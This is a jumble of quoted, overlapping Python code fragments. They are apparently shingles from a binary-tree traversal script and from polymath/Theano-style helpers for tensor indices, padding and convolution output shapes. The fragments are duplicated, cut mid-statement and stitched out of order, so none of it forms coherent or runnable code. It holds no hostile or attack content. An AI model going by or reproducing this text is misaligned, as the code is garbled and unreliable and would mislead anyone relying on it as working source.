(parent, node[\"data\"], left,", "\"right\" in node else None, parent=lambda node: node[\"parent\"] if \"parent\" in node else", "not \"right\" in node: node[\"right\"] = child_node child_node[\"parent\"] = node else: raise Exception(\"parent", "is not None: if left(node) is not None: post_order_walk(left(node), result, left, right, parent)", "child_node child_node[\"parent\"] = node elif not \"right\" in node: node[\"right\"] = child_node child_node[\"parent\"]", "in_order_walk(right(node), result, left, right, parent) \"\"\"A type of depth-first walk of a tree", "tree (parent, left, right)\"\"\" def pre_order_walk(node, result: list, left: Callable, right: Callable, parent:", "Queue \"\"\"A type of depth-first walk of a tree (parent, left, right)\"\"\" def", "Exception(\"parent node is full\") def is_full(node) -> bool: return \"left\" in node and", "17, 15, 16, 10, 9, 19, 18, 14, 7, 4, 13, 11]) print_tree(tree)", "(is_full(current_parent)): current_parent = q.get(block=False) add_child(current_parent, node) else: current_parent = q.get(block=False) return tree def", "child_node[\"parent\"] = node else: raise Exception(\"parent node is full\") def is_full(node) -> bool:", "result, left, right, parent) if right(node) is not None: pre_order_walk(right(node), result, left, right,", "19, 18, 14, 7, 4, 13, 11]) print_tree(tree) pre_order_walk_result = [] pre_order_walk(tree[0], pre_order_walk_result,", "if \"parent\" in node else None) print_tree_minimal(in_order_walk_result) post_order_walk_result = [] post_order_walk(tree[0], post_order_walk_result, left=lambda", "node is not None: if left(node) is not None: in_order_walk(left(node), result, left, right,", "if right(node) is not None: pre_order_walk(right(node), result, left, right, parent) \"\"\"A type of", "adding item %s' % item) node = make_node(item) q.put(node) tree.append(node) if current_parent is", "tree: print(\"%s\" % node[\"data\"], end=' ') print() def main(): tree = make_tree([25, 23,", "depth-first 
walk of a tree (left, right, parent)\"\"\" def post_order_walk(node, result: list, left:", "10, 9, 19, 18, 14, 7, 4, 13, 11]) print_tree(tree) pre_order_walk_result = []", "None: pre_order_walk(left(node), result, left, right, parent) if right(node) is not None: pre_order_walk(right(node), result,", "result.append(node) if right(node) is not None: in_order_walk(right(node), result, left, right, parent) \"\"\"A type", "if left(node) is not None: post_order_walk(left(node), result, left, right, parent) if right(node) is", "depth-first walk of a tree (parent, left, right)\"\"\" def pre_order_walk(node, result: list, left:", "pre_order_walk(right(node), result, left, right, parent) \"\"\"A type of depth-first walk of a tree", "node[\"right\"] if \"right\" in node else None, parent=lambda node: node[\"parent\"] if \"parent\" in", "make_tree([25, 23, 22, 21, 12, 20, 17, 15, 16, 10, 9, 19, 18,", "parent) result.append(node) if right(node) is not None: in_order_walk(right(node), result, left, right, parent) \"\"\"A", "q.get(block=False) if q.empty() is False else None for item in items: print('DEBUG: adding", "\"parent\" in node else None) print_tree_minimal(in_order_walk_result) post_order_walk_result = [] post_order_walk(tree[0], post_order_walk_result, left=lambda node:", "def is_full(node) -> bool: return \"left\" in node and \"right\" in node def", "in_order_walk(tree[0], in_order_walk_result, left=lambda node: node[\"left\"] if \"left\" in node else None, right=lambda node:", "right: Callable, parent: Callable): if node is not None: if left(node) is not", "= [] q = Queue() current_parent = q.get(block=False) if q.empty() is False else", "Queue() current_parent = q.get(block=False) if q.empty() is False else None for item in", "print_tree_minimal(in_order_walk_result) post_order_walk_result = [] post_order_walk(tree[0], post_order_walk_result, left=lambda node: node[\"left\"] if \"left\" in node", "\"right\" in node def make_node(data): node = { \"data\" : data } 
return", "node else None, parent=lambda node: node[\"parent\"] if \"parent\" in node else None) print_tree_minimal(post_order_walk_result)", "= child_node child_node[\"parent\"] = node else: raise Exception(\"parent node is full\") def is_full(node)", "% item) node = make_node(item) q.put(node) tree.append(node) if current_parent is not None: if", "parent) \"\"\"A type of depth-first walk of a tree (left, parent, right)\"\"\" def", "post_order_walk_result = [] post_order_walk(tree[0], post_order_walk_result, left=lambda node: node[\"left\"] if \"left\" in node else", "if \"left\" in node else None right = node[\"right\"][\"data\"] if \"right\" in node", "def add_child(node, child_node): if not \"left\" in node: node[\"left\"] = child_node child_node[\"parent\"] =", "= make_node(item) q.put(node) tree.append(node) if current_parent is not None: if (is_full(current_parent)): current_parent =", "Callable, parent: Callable): if node is not None: result.append(node) if left(node) is not" ]
[ "out_shp: int corresponding to the output image shape on the considered axis. \"\"\"", "{} reverse = True if not broadcastable: reverse = False a_idx = [None]", "s in node_a.shape: idx = node_a.shape.index(s) all_ops.append(idx) else: assert s in node_b.shape, f\"Output", "0 if s in a_map: start = a_map[s] sidx = node_a.shape.index(s, start) a_idx[sidx]", "name=None): n = len(var.shape) assert len(strides) == n out_shape = () nz_indices =", "dim is None: return dim if dim < 0: dim = len(a_shp) +", "b_map[s] = sidx for i in range(len(a_idx)): if a_idx[i] is None: assert node_a.shape[i]", "if not broadcastable: reverse = False a_idx = [None] * len(node_a.shape) b_idx =", "int. It must correspond to the dilation on the considered axis. Returns -------", "kernel shape. For a normal convolution, its four (for 2D convolution) or five", "output.shape == pm.DEFAULT_SHAPES[0]: return tuple([]) else: if not output.shape: raise RuntimeError indices =", "1 out_shp = image_shape - dil_kernel_shape if pad_l != 0: out_shp += pad_l", "padding on height and width (and possibly depth) axis. 
subsample: tuple of int.", "len(dim_combinations) == len(shape) src_indices = [] dst_indices = [] for s in data.shape:", "all_indices, tgt_shape): indices = [] if node.shape == pm.DEFAULT_SHAPES[0]: return tuple(indices) for idx,", "to get the pad option Parameters ---------- padding : int or str Padding", "\\ f\"Target shape: {padded_shape}\\n\" \\ f\"Set shape: {padded_out.shape}\" padded_out.set_shape(padded_shape) n_idx = pm.index(0, data.shape[0]-1)", "+ 1) // 2 return pad_top, pad_left, pad_h - pad_top, pad_w - pad_left", "= len(image_shape) - 2 nkern, kshp = kernel_shape[0], kernel_shape[-convdim:] if isinstance(border_mode, tuple): out_shp", "1) nmap[\"large\"].append(idx) out_idx.append(idx) elif node_a.shape[i] == node_b.shape[i]: if node_a.shape[i] != 1: idx =", "{padded_shape}\\n\" \\ f\"Set shape: {padded_out.shape}\" padded_out.set_shape(padded_shape) n_idx = pm.index(0, data.shape[0]-1) c_idx = pm.index(0,", "if not output.shape: raise RuntimeError indices = tuple([pm.index(0, s - 1) for s", "+ 0 # STEP 1: idx3 + shape[3]* for dc in reversed(dim_combinations): idx", "b_map = {} for s in node_c.shape: idx = pm.index(0, s - 1)", "pm.Node, pad_size, kernel, pad_val=0): assert len(data.shape) == 4 p_top, p_bottom, p_left, p_right =", "pad option Parameters ---------- padding : int or str Padding size, or ['VALID',", "border_mode >= 0 pad_l = pad_r = border_mode # In case of symbolic", "pad_r = border_mode # In case of symbolic shape, we want to build", "start = 0 if s in a_map: start = a_map[s] sidx = node_a.shape.index(s,", "Copied and simplified from Theano (2020/11/08): https://github.com/Theano/Theano/blob/master/theano/tensor/nnet/abstract_conv.py Parameters ---------- image_shape: tuple of int", "// 2 return pad_top, pad_left, pad_h - pad_top, pad_w - pad_left def pad_node(data:", "be 'valid' or 'full'. subsample: int. 
It must correspond to the subsampling on", "padded_out[(n_idx, c_idx, ih_idx + p_top, iw_idx + p_left)] = data[(n_idx, c_idx, ih_idx, iw_idx)]", "+ 2 * pad - dil_kernel_shape) // subsample + 1 out_shp = image_shape", "data.shape[3] - 1) padded_out[(n_idx, c_idx, oh_idx, ow_idx)] = pad_val padded_out[(n_idx, c_idx, ih_idx +", "TESTING out_idx.append(idx) else: raise RuntimeError(f\"Unable to broadcast indices:\\n\" f\"{node_a.name}: {node_a.shape}\\n\" f\"{node_b.name}: {node_b.shape}\\n\") return", "if isinstance(border_mode, tuple): out_shp = tuple( _get_conv_shape_1axis( imshp[i], kshp[i], border_mode[i], subsample[i], filter_dilation[i], )", "respectively to: batch size, number of input channels, height and width (and possibly", "i in enumerate(all_indices): if len(node.shape) > idx and tgt_shape[idx] == node.shape[idx]: indices.append(i) if", "correspond respectively to : number of output channels, number of input channels, height", "a_idx.append(0) # TESTING b_idx.append(idx) out_idx.append(idx) elif node_b.shape[i] == 1: idx = pm.index(0, node_a.shape[i]", "size on right. \"\"\" # pad_h = pad_w = padding * 2 pad_h", "height and width of the output, number of input channels, height and width", "(2020/11/08): https://github.com/Theano/Theano/blob/master/theano/tensor/nnet/abstract_conv.py Parameters ---------- image_shape: int Corresponds to the input image shape on", "a_map: start = a_map[s] sidx = node_a.shape.index(s, start) a_idx[sidx] = idx a_map[s] =", "abs(i): idx = pm.index(0, lg_node.shape[i] - 1) nmap[\"large\"].append(idx) out_idx.append(idx) elif node_a.shape[i] == node_b.shape[i]:", "): \"\"\"This function compute the output shape of convolution operation. 
Copied and simplified", "idx = format_idx([]) indices = _get_single_node_indices(node_b) return idx, indices, indices elif node_b.shape ==", "= _get_single_node_indices(node_b) return idx, indices, indices elif node_b.shape == pm.DEFAULT_SHAPES[0]: idx = format_idx([])", "len(a_shp) + dim return dim def _get_conv_shape_1axis( image_shape, kernel_shape, border_mode, subsample, dilation=1 ):", "out_idx.append(idx) elif node_a.shape[i] == 1: idx = pm.index(0, node_b.shape[i] - 1) if zero_indices:", "range(len(b_idx)): if b_idx[i] is None: assert node_b.shape[i] == 1 b_idx[i] = 0 else:", "idx b_map[s] = sidx for i in range(len(a_idx)): if a_idx[i] is None: assert", "range(len(subsample)) ) else: out_shp = tuple( _get_conv_shape_1axis( imshp[i], kshp[i], border_mode, subsample[i], filter_dilation[i] )", "idx = pm.index(0, i - 1) op1.append(idx) all_ops.append(idx) cnt += 1 for i", "if len(pad_size) == 2: # pad_h = pad_size[0] * 2 # pad_w =", "------- pad_top : int Padding size on top pad_left : int Padding size", "cnt = 0 op1 = [] op2 = [] all_ops = [] for", "border_mode[i], subsample[i], filter_dilation[i], ) for i in range(len(subsample)) ) else: out_shp = tuple(", "= True if not broadcastable: reverse = False a_idx = [None] * len(node_a.shape)", "oh_idx, ow_idx)] = pad_val padded_out[(n_idx, c_idx, ih_idx + p_top, iw_idx + p_left)] =", "not output.shape: raise RuntimeError indices = tuple([pm.index(0, s - 1) for s in", "idx = pm.index(0, node_a.shape[i] - 1) a_idx.append(idx) if zero_indices: b_idx.append(0) # TESTING out_idx.append(idx)", "1) out_idx.append(idx) if s in node_a.shape: start = 0 if s in a_map:", "input channels, height and width of the kernel. None where undefined. 
border_mode: string,", "and tgt_shape[idx] == node.shape[idx]: indices.append(i) if tgt_shape != node.shape: for idx, i in", "np.prod(data.shape) == np.prod(shape) assert len(dim_combinations) == len(shape) src_indices = [] dst_indices = []", "def format_idx(x, reverse=True): if reverse: return tuple(list(reversed(x))) else: return tuple(x) def _get_indices(node, all_indices,", "tuple of int corresponding to the kernel shape. For a normal convolution, its", "= border_mode # In case of symbolic shape, we want to build the", "want to build the smallest graph # (image_shape + 2 * pad -", "= image_shape[0], image_shape[2:] convdim = len(image_shape) - 2 nkern, kshp = kernel_shape[0], kernel_shape[-convdim:]", "== pm.DEFAULT_SHAPES[0]: return tuple([]) else: if not shape: shape = node.shape indices =", "1 add_dim = 0 for d in reversed(dc): idx = src_indices[d]*idx_offset + add_dim", "# if isinstance(pad_size, (tuple, list)): # if len(pad_size) == 2: # pad_h =", "respectively to the dilation on height and width axis. Returns ------- output_shape: tuple", "must correspond to : number of output channels, height and width of the", "= [] all_ops = [] for i in node_a.shape: if i == 1:", "must be 'valid' or 'full'. If it is a tuple, its two (or", "subsample, filter_dilation=(0, 0) ): \"\"\"This function compute the output shape of convolution operation.", "corresponding to the input image shape. Its four (or five) element must correspond", "nkern, kshp = kernel_shape[0], kernel_shape[-convdim:] if isinstance(border_mode, tuple): out_shp = tuple( _get_conv_shape_1axis( imshp[i],", "broadcastable = is_broadcastable(node_a.shape, node_b.shape) a_idx = [] b_idx = [] out_idx = []", "on the considered axis. dilation: int. 
It must correspond to the dilation on", "else: out_shp = tuple( _get_conv_shape_1axis( imshp[i], kshp[i], border_mode, subsample[i], filter_dilation[i] ) for i", "if pad_r != 0: out_shp += pad_r if subsample != 1: out_shp =", "i == 1: op2.append(0) # all_ops.append(0) else: idx = pm.index(0, i - 1)", "else: idx = pm.index(0, i - 1) op2.append(idx) all_ops.append(idx) cnt += 1 if", "shp2[::-1]): if a == 1 or b == 1 or a == b:", "output, axis): if output.shape == pm.DEFAULT_SHAPES[0]: return tuple([]) else: if not output.shape: raise", "to: batch size, number of output channels, height and width of the image.", "1: op2.append(0) # all_ops.append(0) else: idx = pm.index(0, i - 1) op2.append(idx) all_ops.append(idx)", "data.shape[2] + p_top + p_bottom ow = data.shape[3] + p_left + p_right padded_shape", "node_b lg_node = node_a nmap[\"small\"] = b_idx nmap[\"large\"] = a_idx else: small_node =", "tuple of int corresponding to the output image shape. Its four element must", "oh-1) ih_idx = pm.index(0, data.shape[2]-1) ow_idx = pm.index(0, ow-1) iw_idx = pm.index(0, data.shape[3]", "pad_r = dil_kernel_shape - 1 elif border_mode == \"valid\": pad_l = pad_r =", "f\"Target shape: {padded_shape}\\n\" \\ f\"Set shape: {padded_out.shape}\" padded_out.set_shape(padded_shape) n_idx = pm.index(0, data.shape[0]-1) c_idx", "node_c.shape == node_a.shape: indices = _get_single_node_indices(node_a) return indices, indices, indices elif node_a.shape ==", "= False a_idx = [None] * len(node_a.shape) b_idx = [None] * len(node_b.shape) a_map", "for idx, i in enumerate(all_indices): if len(node.shape) > idx and tgt_shape[idx] == node.shape[idx]:", "on a given axis. kernel_shape: int Corresponds to the kernel shape on a", "= a_idx else: small_node = node_a lg_node = node_b nmap[\"small\"] = a_idx nmap[\"large\"]", "output_shape: tuple of int corresponding to the output image shape. 
Its four element", "out_shp += pad_l if pad_r != 0: out_shp += pad_r if subsample !=", "= () shape_idx = () for i in range(n): out_shape += ((var.shape[i] -", "out_node.is_shape_finalized(): all_ops = [] for s in out_node.shape: if s in node_a.shape: idx", "= () for i in range(n): out_shape += ((var.shape[i] - 1) * strides[i]", "pm.placeholder, strides, name=None): n = len(var.shape) assert len(strides) == n out_shape = ()", "tuple of int Conv kernel size Returns ------- pad_top : int Padding size", "1) op1.append(idx) all_ops.append(idx) cnt += 1 for i in node_b.shape: if i in", "# else: # assert isinstance(pad_size, int) # pad_h = pad_w = pad_size *", "1) // 2 # return pad_top, pad_left, pad_h - pad_top, pad_w - pad_left", "and node_c.shape == node_a.shape: indices = _get_single_node_indices(node_a) return indices, indices, indices elif node_a.shape", "b_idx.append(idx) out_idx.append(idx) elif node_b.shape[i] == 1: idx = pm.index(0, node_a.shape[i] - 1) a_idx.append(idx)", "dim if dim < 0: dim = len(a_shp) + dim return dim def", "kshp = kernel_shape[0], kernel_shape[-convdim:] if isinstance(border_mode, tuple): out_shp = tuple( _get_conv_shape_1axis( imshp[i], kshp[i],", "corresponding to the output image shape on the considered axis. \"\"\" # Implicit", "the same value cnt = 0 op1 = [] op2 = [] all_ops", "# # pad_top = (pad_h + 1) // 2 # pad_left = (pad_w", "= (data.shape[0], data.shape[1], oh, ow) if padded_out.is_shape_finalized() and padded_out.shape != (1,): assert padded_shape", "the kernel. For an unshared 2D convolution, its six channels must correspond to", "the padding on height and width (and possibly depth) axis. 
subsample: tuple of", "+= ((var.shape[i] - 1) * strides[i] + 1,) nz_indices += (pm.index(0, out_shape[i] -", "in out_node.shape: if s in node_a.shape: idx = node_a.shape.index(s) all_ops.append(idx) else: assert s", "2 or 4\") # else: # assert isinstance(pad_size, int) # pad_h = pad_w", "tuple([]) else: if not output.shape: raise RuntimeError indices = tuple([pm.index(0, s - 1)", "two or three elements correspond respectively to the dilation on height and width", "np def format_idx(x, reverse=True): if reverse: return tuple(list(reversed(x))) else: return tuple(x) def _get_indices(node,", "len(small_node.shape) < abs(i): idx = pm.index(0, lg_node.shape[i] - 1) nmap[\"large\"].append(idx) out_idx.append(idx) elif node_a.shape[i]", "Conv kernel size Returns ------- pad_top : int Padding size on top pad_left", "number of input channels, height and width of the kernel. None where undefined.", "about multiple dimensions with the same value cnt = 0 op1 = []", "2 # pad_w = pad_size[1] * 2 # elif len(pad_size) == 4: #", "respectively to : number of output channels, number of input channels, height and", "1) a_idx.append(idx) b_idx.append(idx) out_idx.append(idx) elif node_a.shape[i] == 1: idx = pm.index(0, node_b.shape[i] -", "src_indices = [] dst_indices = [] for s in data.shape: idx = pm.index(0,", "node_a.shape[i] - 1) a_idx.append(idx) b_idx.append(idx) out_idx.append(idx) elif node_a.shape[i] == 1: idx = pm.index(0,", "image_shape: int Corresponds to the input image shape on a given axis. kernel_shape:", "and width of the output, number of input channels, height and width of", "Corresponds to the kernel shape on a given axis. 
border_mode: string or int.", "== 1: idx = pm.index(0, node_a.shape[i] - 1) a_idx.append(idx) if zero_indices: b_idx.append(0) #", "ow_idx = pm.index(0, ow-1) iw_idx = pm.index(0, data.shape[3] - 1) padded_out[(n_idx, c_idx, oh_idx,", ") else: out_shp = tuple( _get_conv_shape_1axis( imshp[i], kshp[i], border_mode, subsample[i], filter_dilation[i] ) for", "b_idx = [] out_idx = [] nmap = {} reverse = True if", "= format_idx([]) indices = _get_single_node_indices(node_a) return indices, idx, indices if len(node_a.shape) > len(node_b.shape):", "a_idx = [] b_idx = [] out_idx = [] nmap = {} reverse", "shape_idx += (pm.index(0, out_shape[i] - 1),) padded = pm.temp(name=name, shape=out_shape) padded[shape_idx] = 0", "if border_mode == \"full\": pad_l = pad_r = dil_kernel_shape - 1 elif border_mode", "reverse), format_idx(out_idx, reverse) def dilate(var: pm.placeholder, strides, name=None): n = len(var.shape) assert len(strides)", "= pad_w = padding * 2 pad_h = padding[0] * 2 pad_w =", "+ p_right padded_shape = (data.shape[0], data.shape[1], oh, ow) if padded_out.is_shape_finalized() and padded_out.shape !=", "== 1 or a == b: pass else: return False return True #", "border_mode # In case of symbolic shape, we want to build the smallest", "== node_b.shape[i]: if node_a.shape[i] != 1: idx = pm.index(0, node_a.shape[i] - 1) a_idx.append(idx)", "[None] * len(node_b.shape) a_map = {} b_map = {} for s in node_c.shape:", "value {s} not in other shapes\" idx = node_b.shape.index(s) all_ops.append(idx) return op1, op2,", "1 or b == 1 or a == b: pass else: return False", "= pm.index(0, node_a.shape[i] - 1) a_idx.append(idx) b_idx.append(idx) out_idx.append(idx) elif node_a.shape[i] == 1: idx", "+ p_left + p_right padded_shape = (data.shape[0], data.shape[1], oh, ow) if padded_out.is_shape_finalized() and", "n_idx = pm.index(0, data.shape[0]-1) c_idx = pm.index(0, data.shape[1]-1) oh_idx = pm.index(0, oh-1) ih_idx", "string, it must be 'valid' or 'full'. 
If it is a tuple, its", "range(n): out_shape += ((var.shape[i] - 1) * strides[i] + 1,) nz_indices += (pm.index(0,", "subsample[i], filter_dilation[i], ) for i in range(len(subsample)) ) else: out_shp = tuple( _get_conv_shape_1axis(", "if pad_l != 0: out_shp += pad_l if pad_r != 0: out_shp +=", "= pm.index(0, ow-1) iw_idx = pm.index(0, data.shape[3] - 1) padded_out[(n_idx, c_idx, oh_idx, ow_idx)]", "border_mode, subsample[i], filter_dilation[i] ) for i in range(len(subsample)) ) return (bsize, nkern) +", "# TESTING out_idx.append(idx) else: raise RuntimeError(f\"Unable to broadcast indices:\\n\" f\"{node_a.name}: {node_a.shape}\\n\" f\"{node_b.name}: {node_b.shape}\\n\")", "tgt_shape[idx] == node.shape[idx]: indices.append(i) if tgt_shape != node.shape: for idx, i in enumerate(node.shape):", "or ['VALID', 'SAME'] kernel : tuple of int Conv kernel size Returns -------", "the input image shape on a given axis. kernel_shape: int Corresponds to the", "a_idx.append(idx) if zero_indices: b_idx.append(0) # TESTING out_idx.append(idx) else: raise RuntimeError(f\"Unable to broadcast indices:\\n\"", "can only be 2 or 4\") # else: # assert isinstance(pad_size, int) #", "number of output channels, number of input channels, height and width (and possibly", "is a tuple, its two (or three) elements respectively correspond to the padding", "image. None where undefined. 
kernel_shape: tuple of int corresponding to the kernel shape.", "or three elements respectively correspond to the subsampling on height and width (and", "if s in a_map: start = a_map[s] sidx = node_a.shape.index(s, start) a_idx[sidx] =", "padding : int or str Padding size, or ['VALID', 'SAME'] kernel : tuple", "= idx b_map[s] = sidx for i in range(len(a_idx)): if a_idx[i] is None:", "out_shp = out_shp + 1 return out_shp def _get_conv_output_shape( image_shape, kernel_shape, border_mode, subsample,", "convolution, its six channels must correspond to : number of output channels, height", "respectively correspond to the subsampling on height and width (and possibly depth) axis.", "polymath as pm import numpy as np def format_idx(x, reverse=True): if reverse: return", "def pad_node(data: pm.Node, padded_out: pm.Node, pad_size, kernel, pad_val=0): assert len(data.shape) == 4 p_top,", "the output image shape on the considered axis. \"\"\" # Implicit dilated kernel", "data.shape[2]-1) ow_idx = pm.index(0, ow-1) iw_idx = pm.index(0, data.shape[3] - 1) padded_out[(n_idx, c_idx,", "pm.index(0, data.shape[2]-1) ow_idx = pm.index(0, ow-1) iw_idx = pm.index(0, data.shape[3] - 1) padded_out[(n_idx,", "tuple of int. If it is a string, it must be 'valid' or", "axis): if output.shape == pm.DEFAULT_SHAPES[0]: return tuple([]) else: if not output.shape: raise RuntimeError", "x.shape[dim] - 1) return idx def _dim_explicit(a_shp, dim): if dim is None: return", "f\"Set shape: {padded_out.shape}\" padded_out.set_shape(padded_shape) n_idx = pm.index(0, data.shape[0]-1) c_idx = pm.index(0, data.shape[1]-1) oh_idx", "possibly depth) of the image. None where undefined. 
kernel_shape: tuple of int corresponding", "import polymath as pm import numpy as np def format_idx(x, reverse=True): if reverse:", "all_ops = [] for s in out_node.shape: if s in node_a.shape: idx =", "== node_a.shape: indices = _get_single_node_indices(node_a) return indices, indices, indices elif node_a.shape == pm.DEFAULT_SHAPES[0]", "STEP 1: idx3 + shape[3]* for dc in reversed(dim_combinations): idx = 0 idx_offset", "dim): assert len(x.shape) < dim idx = pm.index(0, x.shape[dim] - 1) return idx", "padding * 2 pad_h = padding[0] * 2 pad_w = padding[1] * 2", "1,) nz_indices += (pm.index(0, out_shape[i] - 1, stride=strides[i]),) shape_idx += (pm.index(0, out_shape[i] -", "in reversed(dim_combinations): idx = 0 idx_offset = 1 add_dim = 0 for d", "---------- image_shape: int Corresponds to the input image shape on a given axis.", "kernel : tuple of int Conv kernel size Returns ------- pad_top : int", "op1, op2, all_ops def _get_single_node_indices(node, shape=None): if node.shape == pm.DEFAULT_SHAPES[0]: return tuple([]) else:", "theano (2020/11/08): https://github.com/Theano/Theano/blob/master/theano/tensor/nnet/abstract_conv.py Parameters ---------- image_shape: int Corresponds to the input image shape", "'valid' or 'full'. subsample: int. 
It must correspond to the subsampling on the", "broadcasting rules def _get_elem_indices(node_a, node_b, node_c, zero_indices=True): broadcastable = is_broadcastable(node_a.shape, node_b.shape) a_idx =", "build the smallest graph # (image_shape + 2 * pad - dil_kernel_shape) //", "for i in range(len(a_idx)): if a_idx[i] is None: assert node_a.shape[i] == 1 a_idx[i]", "- 1, -1): if len(small_node.shape) < abs(i): idx = pm.index(0, lg_node.shape[i] - 1)", "op2, all_ops def _get_single_node_indices(node, shape=None): if node.shape == pm.DEFAULT_SHAPES[0]: return tuple([]) else: if", "add_dim idx_offset = data.shape[d] def _get_indices_for_dim(x, dim): assert len(x.shape) < dim idx =", "node_a.shape.index(s, start) a_idx[sidx] = idx a_map[s] = sidx if s in node_b.shape: start", "for padding:\\n\" \\ f\"Target shape: {padded_shape}\\n\" \\ f\"Set shape: {padded_out.shape}\" padded_out.set_shape(padded_shape) n_idx =", "dil_kernel_shape = (kernel_shape - 1) * dilation + 1 if border_mode == \"full\":", "correspond respectively to the dilation on height and width axis. 
Returns ------- output_shape:", "= 0 if s in b_map: start = b_map[s] sidx = node_b.shape.index(s, start)", "imshp = image_shape[0], image_shape[2:] convdim = len(image_shape) - 2 nkern, kshp = kernel_shape[0],", "dilate(var: pm.placeholder, strides, name=None): n = len(var.shape) assert len(strides) == n out_shape =", "elif node_b.shape[i] == 1: idx = pm.index(0, node_a.shape[i] - 1) a_idx.append(idx) if zero_indices:", "= pm.index(0, data.shape[3] - 1) padded_out[(n_idx, c_idx, oh_idx, ow_idx)] = pad_val padded_out[(n_idx, c_idx,", "not in other shapes\" idx = node_b.shape.index(s) all_ops.append(idx) return op1, op2, all_ops def", "_get_conv_shape_1axis( imshp[i], kshp[i], border_mode, subsample[i], filter_dilation[i] ) for i in range(len(subsample)) ) return", "dim < 0: dim = len(a_shp) + dim return dim def _get_conv_shape_1axis( image_shape,", "- 1),) padded = pm.temp(name=name, shape=out_shape) padded[shape_idx] = 0 padded[(shape_idx[0])] = 0 #", "For an unshared 2D convolution, its six channels must correspond to : number", "tuple( _get_conv_shape_1axis( imshp[i], kshp[i], border_mode[i], subsample[i], filter_dilation[i], ) for i in range(len(subsample)) )", "node_a.shape == node_b.shape and node_c.shape == node_a.shape: indices = _get_single_node_indices(node_a) return indices, indices,", "(image_shape + 2 * pad - dil_kernel_shape) // subsample + 1 out_shp =", "a == 1 or b == 1 or a == b: pass else:", "number of input channels, height and width (and possibly depth) of the kernel.", "+ p_top + p_bottom ow = data.shape[3] + p_left + p_right padded_shape =", "= b_idx for i in range(-1, -len(lg_node.shape) - 1, -1): if len(small_node.shape) <", "shape. 
Its four (or five) element must correspond respectively to: batch size, number", "tgt_shape): indices = [] if node.shape == pm.DEFAULT_SHAPES[0]: return tuple(indices) for idx, i", "oh, ow) if padded_out.is_shape_finalized() and padded_out.shape != (1,): assert padded_shape == padded_out.shape, f\"Unequal", "zero_indices: a_idx.append(0) # TESTING b_idx.append(idx) out_idx.append(idx) elif node_b.shape[i] == 1: idx = pm.index(0,", "is_broadcastable(shp1, shp2): for a, b in zip(shp1[::-1], shp2[::-1]): if a == 1 or", "height and width (and possibly depth) axis. subsample: tuple of int. Its two", "< abs(i): idx = pm.index(0, lg_node.shape[i] - 1) nmap[\"large\"].append(idx) out_idx.append(idx) elif node_a.shape[i] ==", "numpy broadcasting rules def _get_elem_indices(node_a, node_b, node_c, zero_indices=True): broadcastable = is_broadcastable(node_a.shape, node_b.shape) a_idx", "len(strides) == n out_shape = () nz_indices = () shape_idx = () for", "node_c, zero_indices=True): broadcastable = is_broadcastable(node_a.shape, node_b.shape) a_idx = [] b_idx = [] out_idx", "- pad_top, pad_w - pad_left def get_pad_tuple(padding, kernel): \"\"\"Common code to get the", "border_mode: string or int. If it is a string, it must be 'valid'", "1: out_shp = out_shp // subsample out_shp = out_shp + 1 return out_shp", "* len(node_b.shape) a_map = {} b_map = {} for s in node_c.shape: idx", "shape on a given axis. border_mode: string or int. 
If it is a", "Parameters ---------- padding : int or str Padding size, or ['VALID', 'SAME'] kernel", "broadcast indices:\\n\" f\"{node_a.name}: {node_a.shape}\\n\" f\"{node_b.name}: {node_b.shape}\\n\") return format_idx(a_idx, reverse), format_idx(b_idx, reverse), format_idx(out_idx, reverse)", "https://github.com/Theano/Theano/blob/master/theano/tensor/nnet/abstract_conv.py Parameters ---------- image_shape: int Corresponds to the input image shape on a", "sidx = node_b.shape.index(s, start) b_idx[sidx] = idx b_map[s] = sidx for i in", "shape dil_kernel_shape = (kernel_shape - 1) * dilation + 1 if border_mode ==", "or str Padding size, or ['VALID', 'SAME'] kernel : tuple of int Conv", "axis. border_mode: string or int. If it is a string, it must be", "to: batch size, number of input channels, height and width (and possibly depth)", "top pad_left : int Padding size on left pad_down : int Padding size", "1) * strides[i] + 1,) nz_indices += (pm.index(0, out_shape[i] - 1, stride=strides[i]),) shape_idx", "2 # # pad_top = (pad_h + 1) // 2 # pad_left =", "idx = pm.index(0, node_a.shape[i] - 1) a_idx.append(idx) b_idx.append(idx) out_idx.append(idx) elif node_a.shape[i] == 1:", "1 for i in node_b.shape: if i in node_a.shape: idx = node_a.shape.index(i) op2.append(op1[idx])", "[] for s in data.shape: idx = pm.index(0, s-1) src_indices.append(idx) # STEP 0:", "dim): if dim is None: return dim if dim < 0: dim =", "1 a_idx[i] = 0 for i in range(len(b_idx)): if b_idx[i] is None: assert", "Padding size, or ['VALID', 'SAME'] kernel : tuple of int Conv kernel size", "Returns ------- out_shp: int corresponding to the output image shape on the considered", "dilation: int. It must correspond to the dilation on the considered axis. Returns", "padded_out[(n_idx, c_idx, oh_idx, ow_idx)] = pad_val padded_out[(n_idx, c_idx, ih_idx + p_top, iw_idx +", "= 0 for d in reversed(dc): idx = src_indices[d]*idx_offset + add_dim idx_offset =", "of int. 
Its two or three elements respectively correspond to the subsampling on", "or a == b: pass else: return False return True # Use numpy", "ow_idx)] = pad_val padded_out[(n_idx, c_idx, ih_idx + p_top, iw_idx + p_left)] = data[(n_idx,", "dim return dim def _get_conv_shape_1axis( image_shape, kernel_shape, border_mode, subsample, dilation=1 ): \"\"\"This function", "isinstance(pad_size, int) # pad_h = pad_w = pad_size * 2 # # pad_top", "pad_size[0] * 2 # pad_w = pad_size[1] * 2 # elif len(pad_size) ==", "i in node_b.shape: if i in node_a.shape: idx = node_a.shape.index(i) op2.append(op1[idx]) elif i", "and width (and possibly depth) axis. subsample: tuple of int. Its two or", "pm.DEFAULT_SHAPES[0]: idx = format_idx([]) indices = _get_single_node_indices(node_a) return indices, idx, indices if len(node_a.shape)", "== pm.DEFAULT_SHAPES[0]: idx = format_idx([]) indices = _get_single_node_indices(node_a) return indices, idx, indices if", "height and width of the kernel. None where undefined. border_mode: string, or tuple", "shp2): for a, b in zip(shp1[::-1], shp2[::-1]): if a == 1 or b", "# all_ops.append(0) else: idx = pm.index(0, i - 1) op1.append(idx) all_ops.append(idx) cnt +=", "s in out_node.shape: if s in node_a.shape: idx = node_a.shape.index(s) all_ops.append(idx) else: assert", "== 1: op1.append(0) # all_ops.append(0) else: idx = pm.index(0, i - 1) op1.append(idx)", "must correspond respectively to: batch size, number of input channels, height and width", "in node_b.shape: start = 0 if s in b_map: start = b_map[s] sidx", "image_shape: tuple of int corresponding to the input image shape. Its four (or", "compute the output shape of convolution operation. 
